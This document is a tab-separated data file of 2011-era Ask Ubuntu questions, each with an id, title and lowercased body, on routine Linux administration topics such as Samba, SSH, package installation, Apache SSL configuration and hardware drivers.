51904	is there a ( simple ) replacement for swat ?	years and years ago , a client of mine had a dying windows nt server 4.0 box that was really only used as a file server . i replaced it with suse and samba ( it 's been so long , i no longer remember version numbers - or even years ) and gave the local power user a shortcut to swat and instructions on how to resolve connection conflicts . a couple of years ago , that machine was showing its age , and i replaced it with a 64-bit , dual-core machine running ubuntu server 9.04 . better in all sorts of ways - performance , simplicity of configuration , ease of setting up samba to play nice with legacy apps ( which was a huge nightmare when i was setting up suse ! ) - except : no swat ! here 's the situation : the main line-of-business app used to be a dos/ctree database app ; that program uses dos share ( and its windows successors ) to handle file/record locking . in addition , certain utility functions ( e.g . `` close the day '' ) require exclusive access to the database . swat gave the power user a way to see which stations had open connections to the database , and to kick them off if they were unresponsive . of course i 've installed webmin , and that gives me all the power that swat did - and a whole lot more , which is the problem . i ca n't make a shortcut directly to the samba / connections section , so the user has to navigate the menu ... and furthermore , there are a lot of options that the user does n't need , and that i do n't necessarily want her to have . so far the solution has been that she calls me when there 's an issue , and i log in to webmin and resolve it . also , they migrated to a much newer line-of-business app , and the old one is winding down . still , though - is there anything that does ( just ) what i 'm looking for ( and nothing else ) ? edit : when i upgraded to ubuntu 9.04 , i did install swat , and i tried to use it . as the package summary warns , it did bad things ; not only did it rearrange entries in my smb.conf , but samba itself had been significantly updated relative to swat ( i seem to recall that the issues had to do with oplock handling , which broke the dos app ) , and nothing really worked anymore . eventually i uninstalled swat , put my smb.conf back the way it had been , and used webmin . i hear and understand the suggestion that i update to a newer version of ubuntu : i will do that as soon as i have the opportunity . but has swat been fixed ? has anyone actually used it recently ? because last time i tried it , it was not a good experience ... update : i upgraded last night ... what a nightmare that turned out to be ! do-version-upgrade insisted on thinking i wanted to jump straight from jaunty to lucid ( and of course insisting that i could n't ) ; eventually i just edited all of the sources from `` jaunty '' to `` karmic '' and did a full-upgrade . then when i restarted , grub failed to start up with an error 15 - turns out that it had added an extra `` /boot '' to the beginning of every entry in the list . got that fixed ; did a do-version-upgrade to lucid ... which broke hylafax . ( the bugtrackers claim that the problem 's been fixed in lucid , but it has n't . ) so i upgraded twice more to natty , which fixed hylafax ... but somewhere along the way , smb.conf got trashed ! but all 's well that ends well , i guess . after all that , i did n't have the heart to try swat ( considering the hash it made of things last time i tried it , in 2009 ) ; i 'll try it in a day or two when i have time for experiments .
51914	trying to stop a service with cron	on my ubuntu 11.04 server when i try to run service powernap stop as a cron job with the root user , it fails and gives me this message in syslog nas cron [ 10853 ] : ( cron ) error ( grandchild # 10854 failed with exit status 2 ) and this is emailed to the root users email account exec : 129 : stop : not found i can start and stop the powernap service from the command line so why does n't it work from cron ?
51916	display goes into powersaver mode tho power option for screen set to `` never ''	i need to make it so the screen never goes into powersaver mode ... upon updating from 10.10 to 11.04 on two different pcs ( one dell tower , one toshiba laptop ) , the display now goes into power-saving mode after ? ? ? minutes although the power option is set to `` never '' . in both cases i have the screensaver set to activate at 10 minutes using gltext which is a floating editable text string . the screensaver kicks in just fine but at some point the screen goes black until a key is pressed or mouse is jiggled . screensaver comes on briefly then the desktop comes up , so the pc is not itself powering down , just the display . power settings have been set to `` never '' and then as default under the administrator-level account , and the pc normally runs under a limited-authority public user profile . whether run under the admin or under the public profiles , the display eventually powers down . there is no powersaver in the bios of either pc . i 'm thinking it 's a bug in 11.04 , but has anyone got any idea how i can alleviate this otherwise ? thanks a mil .
51917	ca n't set maximum resolution on an lg flatron l177wsb	i have an lg flatron l177wsb monitor . my supported resolution is maximum 8192 x 8192 according to the xrandr command . but ubuntu only allows me to set maximum resolution of 1024 x 768 . i would like to have a resolution of about 1440 x 900 or whatever is best but not 1024x768 . also ubuntu does n't detect my monitor and shows it as `` unknown '' . i am using ubuntu 11.04 on intel i3 with a gigabyte motherboard and no extra graphics card . it is only whats there on the motherboard . what can be the cause of this and how should i increase my resolution ? thanks .
51925	how do i configure a new ubuntu installation to accept ssh connections ?	i just installed ubuntu 11.04 ( in a vm ) . how do i set it up to allow me to ssh into it ? ( right now i get `` ssh : connect to host x.x.x.x port 22 : operation timed out '' . )
51928	fast and reliable way to move directories from one hdd to another	i 'm looking for a fast and reliable way to move some chosen directories from one hdd to another . the case is as follows . i 'm getting a new desktop system which will replace my old desktop . i want to migrate a couple of directories from the old system to the new system and i 'm quite concerned about the integrity of the data . the amount of data i want to migrate is > 300 gb . this might take a while to move even over 1000 mbit/s ethernet , so i figure the fastest way is to unplug the hdd of the old desktop ( it 's connected via sata ) and plug it into the new system and cp the data to the new system 's hdd . my question : is this the best and most reliable way to proceed ? if not , how should i proceed ? maybe i 'm better off using rsync ? i would also want to know how any solution handles permissions and how it preserves the integrity of the data .
51931	error : [ brasero disk burner ] : you do not have the required permissions to use this drive	i just installed ubuntu 11.04 and then installed some programs . now , when i run the `` brasero disk burner '' for creating an image from a dvd , it gives me an error : the image could not be created at the specified location . do you want to specify another location for this session or retry with the current location ? you do not have the required permissions to use this drive . i checked the permissions for my home directory and it shows nothing wrong : folder access : create and delete files i tried to create the image on different folders in vain . i wonder what the problem is ?
51937	how do i approve specific computers to ssh into a machine with password authentication disabled ?	the instructions in help.ubuntu.com/community/ssh/openssh/configuring recommend disabling password authentication so that `` it will only be possible to connect from computers you have specifically approved '' . but they do n't say how to specifically approve a computer . how do i do that ?
51939	how to fix error in pdf2djvu : `` bogus memory allocation size ''	i am using pdf2djvu to convert a pdf file into a djvu file , but got this error while trying to convert either bundled or indirect multi-page djvu file : $ pdf2djvu 1.pdf -o 1.djvu 1.pdf : - page # 1 - > # 1 bogus memory allocation size $ pdf2djvu 1.pdf -i 1.djvu 1.pdf : - page # 1 - > # 1 bogus memory allocation size i was wondering what is wrong here and how i shall fix the problem ? you can suggest another application other than pdf2djvu . to convert it to djvu my pdf file can be downloaded from here , in case that you may wonder what is special about it . thanks and regards
51940	any similar function like ubuntu software center in kubuntu ?	i am trying out kubuntu 11.04 and i am a total newbie for linux . i played ubuntu before but did n't really like its setup . however , i did find software center is very convenience tool but i could n't find the similar function in kubuntu . now i ca n't even install flash player ... : ( .. any helps ? thanks .
51943	memory problem with gedit	i found that as a gedit session runs longer , the more memory it takes , regardless of how small the sizes of the text files opened in the session are . so is it normal or a memory leak problem ? for example , i now open 16 text files , each about 1~2kb , but the memory gedit takes is 100mib . thanks and regards !
51944	remember what files are opened in a session of gedit ?	i was wondering if it is possible to remember what files are opened in a session of gedit , by gedit itself or its plug-ins , just similar to what session manager of firefox does ? so that next time restarting gedit , i can reopen and continue to work on the files opened in last session . thanks and regards !
51947	installing tortoisehg : need higher mercurial version	i 'm using ubuntu 11.04 , and i 'm trying to install tortoisehg . i 've applied the ppa from tortoisehg 's website , so that apt-get can actually find it . but whenever i type sudo apt-get tortoisehg , i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : tortoisehg : depends : mercurial ( > = 1.8 ) but 1.7.5-1ubuntu1 is to be installed e : broken packages i understand what this means : i need to install mercurial 1.8 . the problem is that i ca n't . if i try sudo apt-get install mercurial , it says that 1.7.5 is the latest version , which it most certainly is n't . so how do i convince this thing to install a more recent version of mercurial ? i tried the commands from this answer to install mercurial , but that did n't help . it again said that mercurial was up to date .
51948	my dell xps m1330 gets very hot	my dell xps m1330 gets very hot when im running ubuntu 11.04 ( or any earlier editions ) it 's running cool and nice in windows 7 and vista . it 's so hot that 's not comfortable to touch the palm rest . what can i do to get it to cool down like in windows 7 ?
51951	set default group for user when they create new files ?	i often find myself chown-ing files as i created them through ssh and they are owned by jm : jm for example . then to allow apache to access it , i need to for example do chown jm : www-data . i am sure i can specify that when i create files , instead of using the group under my name , specify another ? or is there a better way of managing users/groups ?
51959	listing files which will be installed by .deb	how can i list all the files ( and their future locations ) which will be installed by invoking 'dpkg -i ' on a .deb file ? which makefile target of the source package determines those ( is it the default 'install ' target ? ) ( the second part of the question concerns the package creation process . i want the list of files installed by 'make install ' and the list of files installed by the .deb package to be the same )
51966	how to disable text blur in evince ?	evince blurs pdfs by default ( see comparison image ) . is there a way to disable this behavior ? bonus points for a solution that works on a per-document basis .
51967	checking which options were passed to ./configure	is it possible to find out which options of the ./configure script were used to create the makefile ?
51970	how to switch between gpu 's on an asus eee1015pn	i have an asus eee1015pn intel n550 with two gpu 's : gma3150 and nvidia ion2 . if i use ( but i do n't want to ) windows 7 and i want to watch a full hd movie , then it switches to the bigger gpu . if i want to use ubuntu 11.04 , then can i switch between the two gpu 's on-the-fly in a similar way as windows 7 - if yes , how do i do this ? if no , what progress is being made towards achieving the same capability as windows 7 ?
51982	what can i use to install a package file with dependency from command line ?	i want to install my project 's debian package from a shell script . for that i 'm using the command sudo dpkg -i my_project_0.1.deb . but it 's not going to install dependency . i 've also tried sudo dpkg -i -- force-depends . but still error . below commands can solve the problem , sudo dpkg -i downloaded_package.deb sudo apt-get -f install but i 'm looking for any other solution ( as it would install broken dependency for all packages ) . how could i solve the problem ? is there any other command instead of dpkg ? thanks !
51983	unable to install/boot 11.04 on a thinkpad l520	i have just got a thinkpad l520 and my first step , naturally , is to install ubuntu . i 've got the 11.04 amd64 alternate cd , but every time i run anything from the first menu i just get a blank screen . the weird thing is , i tried the i386 live disk and it loads fine , but i have 6gb ram and would rather use it all : ) there are no error messages or anything of the kind displayed , it simply freezes on a blank screen and i have to do a hard-reset . i have tried an oneiric amd64 desktop daily , but it suffers from the same problem . i also tried 10.04.02 lts amd64 , which installed and appeared to work ( although it did n't support the widescreen or wireless card ) . after an upgrade to 10.10 , it stopped working . booting into the newer kernel resulted in a blank screen , while booting into the older kernel only gives me a console . blank screen - 2.6.35-30-generic console only - 2.6.32-28-generic does anyone have any ideas what i can do to get this working ? i originally thought my problem was similar to the one mentioned in this question , but i have tried this under my console-only install of 10.10 with no luck . trying to boot with nomodeset from the installer just shows a black screen still . any of these options get the installer to work : acpi=off , noapic & nolapic
51984	how to recover data from /var/www ?	i created directory inside /var/www/demo , and placed some files there . by mistake i pressed the delete button , and my files were deleted . now i donât have these files . so how to recover my data from this /var/www/ directory .
51985	blank screen when installing on an acer aspire 4750z	i just got a new acer aspire 4750z laptop i am trying to install ubuntu in it . i downloaded the latest ubuntu 11.04 64 bit and created a startup disk using a usb . i get to the menu to select whether i want to try ubuntu or install ubuntu , but when i select any of these i get a blank screen with a still cursor at top left . i try with pressing e to edit parameters from menu . enter set acpi=off and press f10 to boot . no result .
51988	actual computer memory used by windows xp virtual machine ?	i loaded a windows xp iso into virtual box and my computer went from 415 to 407 gb , how did this happen ?
51991	how can i use skype in ubuntu ?	what are the options to install skype in ubuntu 11.04 ?
51995	how can i use a huawei e1750c usb modem ?	'big ' update i reinstalled the package ( as i and binw pointed out ) and now it recognises the modem as a modem . i configured the network , but i ca n't connect ( acording to the 'lights ' the modem shows i need to introduce the modem ) , so if you could help me with this last step i 'll mention you in a comment on the source code of my next programm ; ) when i connect my usb modem to the computer it appears as a 'normal ' usb , that is , it does n't recognise it is a usb modem , so i ca n't connect my computer to the internet . is there any way to solve this ? i already have installed usb-modeswitch , if that helps you : ) edit : the syslog - > [ 899.168328 ] usb 2-4 : usb disconnect , address 4 [ 899.219995 ] scsi 10:0:0:0 : rejecting i/o to dead device [ 907.436065 ] usb 2-4 : new high speed usb device using ehci_hcd and address 5 [ 907.570709 ] usb 2-4 : configuration # 1 chosen from 1 choice [ 907.572502 ] scsi12 : scsi emulation for usb mass storage devices [ 907.572849 ] usb-storage : device found at 5 [ 907.572852 ] usb-storage : waiting for device to settle before scanning [ 907.572896 ] scsi13 : scsi emulation for usb mass storage devices [ 907.573116 ] usb-storage : device found at 5 [ 907.573118 ] usb-storage : waiting for device to settle before scanning [ 912.572899 ] usb-storage : device scan complete [ 912.573352 ] usb-storage : device scan complete [ 912.573607 ] scsi 12:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 912.573974 ] scsi 13:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 912.580691 ] sr1 : scsi-1 drive [ 912.580880 ] sr 12:0:0:0 : attached scsi cd-rom sr1 [ 912.580989 ] sr 12:0:0:0 : attached scsi generic sg3 type 5 [ 912.581309 ] sd 13:0:0:0 : attached scsi generic sg4 type 0 [ 912.594637 ] sd 13:0:0:0 : [ sdc ] attached scsi removable disk [ 925.115931 ] iso 9660 extensions : microsoft joliet level 1 [ 925.116685 ] isofs : changing to secondary root edit 2 just in case it is relevant , it used to work out of the box on ubuntu 11.04 , but not on 10.04 ( my case ) ( i ca n't upgrade , do n't ask me to do that , please ) edit 3 i 've been doing some research and it seems it should work perfectly with usb-modeswitch , so i 'll try to reinstall it .
52000	is there a way to change the log-in sound	i do n't like the current log-in sound in 11.04 and i want my own sound . can i change the log-in sound ?
52001	adding additional dns search domains when using dhcp	how can i add additional dns search domains to a network connection which is configured using dhcp ? at work , we have several sub-domains ( test.example.com , dev.example.com , etc ) , and i 've grown tired of perpending the sub-domain every time i need to access a server in one of the sub-domains .
52004	how to find the type of the file without using extension	i ask this question for running an find command . i want to list all mp3 ( lets say ) using the find command.how to do this without having an extension .
52007	can not login to newly installed ubuntu server in virtualbox	i 've just completed a fresh new installation of ubuntu 11.04 server ( 64 bit ) including xfce . after the installation was complete ( along with all the lamp server components ) , i started x for the first time and all was good . after the initial reboot , i get the nice xfce login screen . i put in my credentials , it suddenly switches to command-line mode for less than half a second and returns me to the pretty xfce login prompt . the login credentials are correct , as if i intentionally using the wrong username or password , it tells me so . i managed to capture an image of the terminal window that flashes up and disappears - all just an install script with all [ ok ] - no errors at all . now , this is running on a vbox virtual machine , but that should n't really matter - and i 've successfully used the same vbox for dozens of other linux installations - including ubuntu server 10.04 lts . any ideas ?
52011	how do i set up a keyboard shortcut for kate ?	i 'm running gnome . how do i set up a keyboard shortcut to run kate ?
52012	how do i get started with juju ?	i want to mess with ubuntu juju , how do i get started ?
52017	xmonad dual monitors	i have been giving the window manager xmonad a try for a few days now on ubuntu 11.04 . i like it a lot but i just set up a second monitor and have n't found the way to configure xmonad properly for this . what i 'm trying to get is to set the second monitor as the second workspace . anyone have any idea ? thanks .
52021	how do i adjust the instance size that juju uses ?	i 've fired up some of the example instances of wordpress and mysql with juju . a coworker has told me that the default instance size is `` small '' . i 'd like to be able to scale this to different sizes on amazon ec2 . how can i adjust this , is this something defined in a formula or is it an argument i can pass juju on the command line ? let 's say for example i wanted to deploy wordpress on `` large '' amazon instances .
52022	is the ppa of libreoffice to be considered safe for the system ?	i 've got some info on the website of webup8 for adding a ppa from libreoffice to the system ( 11.04 ) in order to get the latest , more stable version , of libreoffice . i 've done that , and i 'm pleased with the outcome . but i gave this as a tip on the dutch forum , and they received it as highly dangerous and risky . i stay within logics : a new version ( read an updated version ) of libreoffice ( 3.3.3 ) ca n't be so unstable that ubuntu ( the os itself ) will crash or do some strange things . ( ? ) i compare it with windows : there you have the same issue with upgrading/ updating libreoffice regardless what it can do with windows itself . or am i wrong with this comparison ? i see that it is for people whom use the office package professionally , as a more reliable way for getting a more stable version of liberoffice . how is your point of view for this matter ?
52025	where can i find a unity configuration file ?	i was wondering if someone can tell me where are the main unity configuration files , at least the file that you can graphically configure through ccsm . i 'm wanting to edit the dash size and the panel colour , but i did n't find where to do it .
52030	would it be safe to install the 11.10 unity version in 11.04 after adding the gnome 3 ppa ?	i was thinking of installing gnome 3 in a regular natty , but i would like to have the option to switch to unity available . since building gnome shell turned out being quite hard a task , i was considering installing unity 4.x , the oneiric version based on gnome 3 , via one of the avilable sources , such as launchpad . would this be possibile and safe ? thanks for your advice !
52040	is there a better pdf to text converter than pdftotext ?	i 'm using pdftotext ( part of poppler-utils ) to convert pdf documents to text . it works , for the most part , but one thing i wish it did was to insert blank lines between separate paragraphs instead of mashing them together . is there way to get pdftotext to do this ? and if not , is there another pdf to text utility that can do this ?
52044	the fn keys on my hp dv6t are mapped all wrong	i 've tried going through the keyboard fixing process documented with that udev readme file ( as described here ) , but i get confused pretty much right off the bat . i 'm using that `` /lib/udev/keymap '' tool to diagnose what 's going on , but the output i get is weird and the instructions do n't really make clear what it is that i should do . the problem i 'm having on this laptop is that the `` fn '' keys all ( or mostly ) seem to behave as if the `` fn '' key is pressed . that is , the `` f6 '' key for example is also the `` previous song '' key when used with the `` fn '' meta key on the keyboard , or at least that 's what it 's supposed to be . well , for me , if i just hit `` f6 '' , key is mapped to `` previoussong '' . if i hit my `` fn '' key , let it go , and then press `` f6 '' , then it comes through as `` f6 '' . for some of the keys , instead of that , a single keypress is reported as two keys : `` leftmeta '' with a scan code of 0xdb , and then the `` fn '' key . so , when i press `` f1 '' ( which is not labeled as having an `` fn '' alternate meaning ) , i get what looks like two separate events . finally , for the `` f2 '' and `` f3 '' keys , labeled as being for screen brightness controls , i get no key events whatsoever if i do n't precede them with a press and release of the `` fn '' meta key . they do , however , show me the brightness adjustment growler message , though they do n't actually seem to have any effect on the display . what do i need to look at in order to get the keyboard to stop being so weird ? ( again , the laptop is a brand new hp dv6t `` quad edition '' with a us keyboard , and i 'm running 11.04 . ) edit — i 've just now started forming a theory that the keyboard might be working as designed , which would be another reason for me to recommend against these things ... grrrr
52045	razer deathadder mouse going nuts	i 'm using ubuntu 11.04 and a razer deathadder mouse . i 've used the mouse in other distros perfectly but now it happens that randomly after some time it will start to act buggy and click things by itself , i have to unplug it and plug it back . any idea what could be going wrong ?
52046	is there a hotkey to switch between tabs in the default terminal app ?	is there a hotkey to switch between tabs in ubuntu 's native terminal app ? i 'm using the netbook version of ubuntu .
52054	is it yet possible to use facebook video chat without a vm ?	i use xubuntu actually , and i have wine , if that helps . i installed facebookvideocallsetup_v1.2.199.0.exe after going to http : //www.facebook.com/videocalling by using wine like this : wine facebookvideocallsetup_v1.2.199.0.exe is my only option to try facebook via a browser that is running in wine ?
52056	is this example of volumes and filesystems still valid ?	hi i am learning how to manage and set up a ubuntu linux server . i 'm reading a book called beginning ubuntu lts server administration . it suggests setting up the hard drive manually and also gives an example set up . the book is based on 8.04 and i am using 10.04 , so my question : is this example set up still valid or can it be improved ? given that the ext4 filesystem is more popular now for example . here is a screenshot of the example setup :
52058	no application icons ( quicksynergy or florence ) in `` indicator applet complete ''	i 'm running ubuntu 11.04 classic . in previous versions of ubuntu i had florence or quick energy staying in the indicator applet after i close or minimmize them . but now only drop box shows up . as a result , when i minimize florence , it runs in the background but there is no way to open it since there is no icon in the applet . not sure how to even approach the problem . i hope i do n't have to reinstal the system to find out which application broke the icons . any suggestions ?
52061	google calender event alert app	i 'd like to be alerted before my google calender appointment 's are due , and i do n't want to install a ton of dependencies , i have limited space . any suggestions ? i tried one but it polled google too much and it broke , i forgot which it is though .
52063	how do i contribute documentation to juju ?	i 've found some bugs in the juju documentation that i 'd like to fix , but the docs are in some format i 've not seen before , how can i contribute ?
52064	my networking drop down becomes unresponsive very often	the networking tray item that lets me choose a network often stops being responsive . how can i reload or reintialize the menu without restarting ? how can i fix it so it works more consistently ?
52066	what is the difference between ubuntu and debian server ?	i know ubuntu is basically debian , and i know ubuntu releases every 6 months , debian every 2 years . however , i want to know more the advanced differences between ubuntu server and debian . if they have the same base , what is the difference between them ?
52072	how do i install the perforce client ?	i am trying to install perforce on my ubuntu machine , after i untar the .tgz file , i get two folders lib and bin . where would be the executable or how do i install it correctly ? thanks .
52073	how to have sound go to a usb mono headset ?	i have a new usb mono headset . i want to know how to make all of the sound go to the mono headset ... i already set that up for skype but other than that , it goes to the speakers instead of the headset . any fixes ? also , i am running esound . edit : i have teamviewer , so if anyone really know what to do ... add me on facebook : kevin maghuyop edit 2 : i removed pulseaudio because i had a problem with the audio jacks ... .and now i dont use them and i have a problem .
52075	will this laptop run on ubuntu ?	i have found a nice laptop but now i am wondering if this laptop ( translation ) can run ubuntu .
52078	`` can not import name genshi '' error when installing the swab library	i 'm trying to install the swab library for python 2.6 in ubuntu 10.10 . however , i get the following error messages when i try to import it . in the terminal i ran : sudo easy_install swab sudo easy_install genshi in the python interpreter i ran : > > > import swab traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.6/dist-packages/swab-0.1.2-py2.6.egg/swab/__init__.py '' , line 23 , in < module > from pestotools.genshi import genshi , render_docstring importerror : can not import name genshi i do n't know whats going on . can anyone help .
52087	sync contact and notes down ?	i try to sync my contacts but ubuntu one say `` something has gone wrong '' ... and now ?
52088	how to have sound drivers and settings the same as they were before from a fresh install ?	i have esound now ... and i had a problem with my audio jacks with pulse audio ... so i removed it and now i have esound ... ..now i want it back as original as it was before like from a fresh install of ubuntu 11.04 ... any fixes ? ( i have teamviewer so if you want to help me add me on facebook : kevin maghuyop )
52089	how do i boot to a command line interface instead of a gui ?	hi i have ubuntu server 10.04 installed and i also installed the following : su aptitude install xorg xfce4 aptitude install < name of gui browser , i use firefox > aptitude install gedit aptitude install gnome-terminal now when i restart the system it goes to the gui login , what i am really after is a system that loads the cli by default and then i can use startx to load the gui when really necessary . i am trying to learn cli but i would like to retain access to the gui for now . and , how can i switch between cli and gui anytime ?
52090	how to install diaspora project ?	could you please tell me the steps , one by one , to reach it ? it 's a little bit difficult for me right now .
52091	upstart script for a transmission-daemon executed as a normal user	i have done a script to start transmission-daemon as a normal user : start on filesystem stop on runlevel [ ! 2345 ] respawn respawn limit 10 5 pre-start script test -x /usr/bin/transmission-daemon || { stop ; exit 0 ; } test -d /home/user/.config/transmission-daemon || { stop ; exit 0 ; } end script exec su -l -c 'transmission-daemon -- foreground -- config-dir /home/user/.config/transmission-daemon -- logfile /home/user/.config/transmission-daemon/daemon.log ' user this script works but i see two processes in execution of transmission-daemon : user 5041 0.0 0.0 48556 1516 ? ss 01:10 0:00 su -l -c transmission-daemon -- foreground -- config-dir /home/user/.config/transmission-daemon -- logfile /home/user/.config/transmission-daemon/daemon.log user user 5048 0.5 0.0 150432 2960 ? sl 01:10 0:00 transmission-daemon -- foreground -- config-dir /home/user/.config/transmission-daemon -- logfile /home/user/.config/transmission-daemon/daemon.log is this correct ? is there another way to execute this better ? note : the default startup script of transmission package is disabled . more info : if i execute transmission as a daemon ( without foreground ) the problem is the detected pid by init : start on filesystem stop on runlevel [ ! 2345 ] expect fork pre-start script test -x /usr/local/bin/transmission-daemon || { stop ; exit 0 ; } test -d /home/mario/.config/transmission-daemon || { stop ; exit 0 ; } end script exec sudo -u user transmission-daemon -- config-dir /home/user/.config/transmission-daemon -- logfile /home/user/.config/transmission-daemon/daemon.log . $ sudo initctl list | grep trans trans-test start/running , process 3110 but really this is the pid of sudo ( finished process ) , the transmission-daemon pid is another : $ ps aux user pid % cpu % mem vsz rss tty stat start time command user 3148 0.0 0.0 154848 2708 ? ssl 13:33 0:00 transmission-daemon
52092	photoshop cs4 portable crashes in wine on `` text input '' ?	i fixed this a while ago on my old computer but i bought a new notebook recently and all versions of photoshop crash on text input . what is causing this ?
52093	how can i initiate nautilus file operations from the command line ?	how can i start nautilus 's `` file operations '' gui from the command line ? my goal is to include this in a nautilus script .
52094	is there a binary package for php5-sqlite3 with fts3 enabled ?	i would like to have php with sqlite with fts3 extension enabled , as noted in manual : sqlite - mediawiki . i 'm somewhat confused about fts3 support in the default ubuntu packages ; from bug # 229003 in sqlite3 ( ubuntu ) : âbuild sqlite3 with fts3 fulltext search â : it would be great if ubuntu can ship with enabled fts3 too . that bug seems to have been fixed in karmic , so from issue 448 - clementine-player - clementine 0.4 does not start - a cross-platform music player based on amarok 1.4 - google project hosting : that 's strange - all of ubuntu 's sqlite3 packages have fts3 enabled , even 3.6.23 ... ... so all should be fine - however , that does n't seem to be the case for php5-sqlite package.. so , it seems , that in order to enable fts3 for php , i 'd have to re-build sqlite ( and possibly php ) from source - but i was hoping there 's a package-like way to use precompiled binaries ( as i 'd like to make an install suggestion to an administrator of a server , and compiling from source will be too troublesome ) . is there ? thanks in advance for any suggestions , cheers !
52096	what do the different boot options mean ? ( i.e . acpi=off , noapic , nolapic , etc )	i 've been having issues installing 11.04 on my new laptop , the solution was to enable any of these boot options : acpi=off noapic nolapic but , what do these options actually do ? what sort of problems are there in enabling them ? i.e . can they cause hardware problems ( like fans not running causing system overheating ) .
52104	flash appears to be missing or broken in all browsers	in firefox and chrome ( both latest stable , ubuntu 11.04 ) , flash is unavailable . i 've uninstalled and reinstalled flashplugin-installer several times . i 've tried creating a plugins folder in /opt/google/chrome and symlinking libflashplayer.so and npwrapper.libflashplayer.so in that folder . going to about : plugins in chrome shows me that the flash plugin is indeed installed and enabled , but nevertheless neither chrome nor firefox actually handle the flash . i 've looked through some questions here and none of those solutions seemed to help . does anybody have any ideas ? thanks !
52106	plugin directory of firefox 5.0	i just downloaded the new firefox in debian and working it . but the flash is not working , though it works well in chrome . i installed the shared library and the adobe says copy that to the firefox plugins directory . i use firefox from the extracted tar file which i downloaded
52110	apache and ssl issues	i have my server set up to use ssl in a separate virtualhost , but when i attempt to use https : //my.domain , i get a connection refused error . the following is my config i 'm using : < virtualhost 173.0.50.62:80 > servername api.bb0.us documentroot /home/tristan/bb0_www/api < /virtualhost > < virtualhost 173.0.50.62:443 > servername api.bb0.us documentroot /home/tristan/bb0_www/api sslengine on sslcertificatefile /etc/apache2/bb0_cert/bb0.crt sslcertificatekeyfile /etc/apache2/bb0_cert/private.key sslcacertificatefile /etc/apache2/bb0_cert/root.crt < /virtualhost > if you do try to go to http : //bb0.us everything will work , but when you attempt https : //bb0.us , it will not work . i do n't have ufw or anything else blocking this , so i 'm confused why this is not working . i 've tried to add a namevirtualhost , but that did n't do anything in fixing this . anyone have any ideas what may be causing this ?
52112	remember what directories are open in one session of nautilus	i was wondering if it is possible to remember what directories are open in one session of nautilus , so that next time starting nautilus , i can reopen the directories . bookmark opened directories one by one is not what i ask for . thanks and regards !
52119	konsole message after upgrade : can not find -lcr	yesterday i upgraded successfully from kubuntu 10.10 to 11.04 but when i start 'konsole' the first thing is : /usr/bin/ld : error : can not find -lcr /usr/bin/ld : /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/../../../crt1.o : ( .text+0x20 ) : error : undefined reference to 'main' collect2 : ld returned 1 exit status /usr/bin/ld : error : can not find -lcr /usr/bin/ld : /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/../../../crt1.o : ( .text+0x20 ) : error : undefined reference to 'main' collect2 : ld returned 1 exit status what can i do to fix this , and what can i generally do to check if my kubuntu installation is working ?
52120	how to change wallpapers of all clients ?	as said before we are running more than 500 ubuntu pc 's in our company . often we used to set our company ads as a wallpaper in clients machine . it is difficult for us to change wallpapers in all these machines one by one & also it is difficult for us to execute script in every machine through ssh to change the wallpaper . is there a way to setup a server like if we change the wallpaper in the server it should be effected in all clients machine . if it is possible , it will save our time and effort . can anyone help ? thanks in advance..
52126	can i open microsoft word and excel files ?	can i open microsoft word and excel files with ubuntu ?
52128	how can i connect to my machine which is connected to internet via dsl ?	i 've configured my machine with dyndns.com so that i can use the ssh and vnc but the problem is , the machine is connected to internet via dsl , . so it uses a network ip address ex ( 192.168.1.xxx ) instead of using the gateway address directly.. i know the gateway ip address ( public ip ) .. but i can not use it to connect to my machine ... how can i do it ? what should i do in order to able to use the gateway so that i can connect to ssh and vnc ? thanks
52137	loco activity/course of action proposal on ubuntu wiki	i would like to publish an plan of action for an activity or event for the loco on ubuntu wiki . is there any convention or format i can refer to ? i do not know how to create and chart a proper activity blueprint , hence i would like pointers on how to get started , what relevant information to add , etc .
52138	how do i change the icon for a particular file type ?	i 'm trying to change the icon for application/x-hwp files . i 've added the icons to the proper places , and checked it with assogiate ( after reading this thread ) . it shows that my desired icon is associated with the file type . nevertheless , nautilus is still showing the old icon . how can i make nautilus show the correct icon ?
52139	how do i configure a mouse thumb button ?	how can i configure the mouse thumb button . for example , if i want it to act as a double click . my mouse is microsoft notebook mouse 5000 bluetooth ( if it matters ) and i use natty . thanks .
52143	is there a pywinauto equivalent to automate the gui from python ?	pywinauto is a set of python modules to automate the microsoft windows gui . at itâs simplest it allows you to send mouse and keyboard actions to windows dialogs and controls . is there a linux-equivalent of this python module ? thanks !
52144	display goes blank screen on mouse touch on a dell vostro 3550	my dell vostro 3550 goes blank screen by touching touchpad . it continues for 10 min after booting . it works normally after a period of time . it happens every time i boot the laptop .
52146	dns server not responding	from time to times i have to reboot my ubuntu 11.04 remote desktop . once it up and i run cromium browser with many tabs ( 20 for example ) dns server does n't respond anymore . at beginning i suspected my isp , so i replaced my /etc/resolv.conf with following values : nameserver 208.67.222.222 nameserver 208.67.220.220 nameserver 8.8.8.8 the result is the same - i ca n't use browser for ~20 min . because names are not resolved , ping does n't work either . any idea what is blocking ?
52147	how can i access apache ( on virtualbox guest ) from host ?	i installed apache on an ubuntu vm . when i go into the guest and load up firefox i can see that apache is working fine when i browse to localhost . i would like to access this same page through the host . i 've tried using the ip address of the guest but nothing comes up . ideally i would love to set up my windows 7 ( host ) to request http : //guestserver.com of the apache server on the guest . how can i do this ?
52153	two mountpoints created in /media for one partition	i have a partition on my ubuntu installation that is named 'media ' at the second position . it comes in as /dev/sda2 . now when it mounts , starting i think with ubuntu 10.10 , i get two directories in /media when it mounts : /media/media ( owned by root , nothing in it ) /media/media_ ( owned by my normal user with all the contents in it ) this is not the way that i remember it happening before ubuntu 10.10 . other drives , external via usb , only have one directory made in /media . in all cases , ( all ) the directory ( ies ) is ( are ) removed by gtk/nautilus , et.al . when unmounted . is this normal ? is it a bug i should report ? i 'm working on a backup script , and i want to know the correcty behavior . mabye this is something to do with the fact that it 's a non root ( filesystem ) but an internal drive ?
